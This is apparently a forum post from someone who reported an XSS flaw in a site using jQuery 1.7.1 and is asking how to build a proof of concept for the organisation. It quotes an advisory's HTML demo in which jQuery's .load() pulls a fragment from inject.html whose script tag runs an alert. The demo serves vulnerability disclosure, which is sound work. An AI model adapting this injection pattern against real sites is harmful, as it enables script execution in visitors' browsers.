I came across a site that was running on Jquery@1.7.1 and also found that it was vulnerable to multiple issues and one was XSS.
I reported this issue and the organization would like to have a working POC but I don’t have an idea how create one. Can anyone help me in this?
https://snyk.io/vuln/SNYK-JS-JQUERY-569619 – This site contains the POC here
<head> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.8.3/jquery.js"></script> </head> <body> <div id="mydiv"></div> <script> $("#mydiv").load('inject.html #himom'); </script> </body> </html>``` **inject.html:** <div id="himom"><script>alert('Arbitrary Code Execution');</script ></div>